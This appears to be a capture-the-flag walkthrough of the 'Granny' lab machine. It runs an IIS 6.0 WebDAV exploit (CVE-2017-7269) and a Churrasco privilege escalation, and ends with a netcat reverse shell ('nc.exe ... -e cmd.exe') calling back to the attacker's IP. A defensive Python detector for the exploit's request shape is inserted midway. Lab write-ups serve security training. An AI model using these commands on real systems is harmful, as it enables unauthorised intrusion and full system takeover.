
Ping

ping 10.10.10.15

Nmap Default Scan

nmap 10.10.10.15 -oN dnmap

Nmap Script and Service scan

nmap 10.10.10.15 -sCV -A -oN snmap

Nmap All Port Scan

nmap 10.10.10.15 -p- --min-rate 10000 -oN anmap

Port 80

I will search for a public exploit for IIS 6.0. I will use this exploit: https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

I saved the Python code in a file named exp.py and ran the exploit.

python2 exp.py 10.10.10.15 80 10.10.14.2 80

rlwrap nc -nvlp 80

Got shell.
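
A defender-side check for the request shape CVE-2017-7269 depends on (a PROPFIND request with a long If header beginning with <http://), added here as an example and not code from this writeup or the linked repository. The 512-byte threshold, the function names and the sample requests are assumptions constructed for illustration; it expects raw request bytes as seen by a reverse proxy or a reassembled packet capture.

```python
# Assumed threshold (not from the page): tune it against your own WebDAV baseline.
MAX_IF_HEADER_LEN = 512

def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, headers); header names lowercased."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].decode("ascii", "replace").upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("ascii", "replace")] = value.strip()
    return method, headers

def suspicious_webdav_if(raw: bytes):
    """Return the reasons a request resembles the CVE-2017-7269 trigger shape."""
    method, headers = parse_request(raw)
    value = headers.get("if")
    # Only PROPFIND requests carrying an If header that opens with a URL tag matter.
    if method != "PROPFIND" or value is None or not value.startswith(b"<http://"):
        return []
    reasons = []
    if len(value) > MAX_IF_HEADER_LEN:
        reasons.append("oversized If header (%d bytes)" % len(value))
    if any(b < 0x20 or b > 0x7E for b in value):
        reasons.append("non-printable or non-ASCII bytes in If header")
    return reasons

# Constructed sample requests (not captured traffic).
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: intranet.example\r\nDepth: 1\r\n"
          b"If: <http://intranet.example/docs/> (<opaquelocktoken:constructed>)\r\n"
          b"Content-Length: 0\r\n\r\n")
OVERSIZED = (b"PROPFIND / HTTP/1.1\r\nHost: intranet.example\r\n"
             b"If: <http://intranet.example/" + b"A" * 900 + b"\xe6\xbd\xa8>\r\n"
             b"Content-Length: 0\r\n\r\n")
OTHER_METHOD = b"GET / HTTP/1.1\r\nHost: intranet.example\r\nIf: <http://x/>\r\n\r\n"

if __name__ == "__main__":
    for name, req in [("benign", BENIGN), ("oversized", OVERSIZED),
                      ("get", OTHER_METHOD)]:
        print(name, suspicious_webdav_if(req))
```
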

Will jump to privilege escalation…!

Our Privileges

whoami /priv

Systeminfo

Looks like there must be some kernel exploit.

Ran exploit suggester

python3 wes.py systeminfo.txt -c

Gonna use this exploit. There is no precompiled binary on Exploit-DB, so I found one. Found the precompiled binary: https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

So once downloaded, I transferred the binary to the target using an SMB share.

impacket-smbserver kali .

copy \\10.10.14.2\kali\churrasco.exe

Let's check whether the binary is working or not.

churrasco.exe whoami

So now I will transfer nc.exe to the target machine and get a shell as admin.

churrasco.exe -d "nc.exe 10.10.14.2 443 -e cmd.exe"

Got reverse shell

rlwrap nc -nvlp 443

Found the location of flags

dir /s /b C:\user.txt
dir /s /b C:\root.txt

Got the flags. user.txt

root.txt

Done with Granny…:)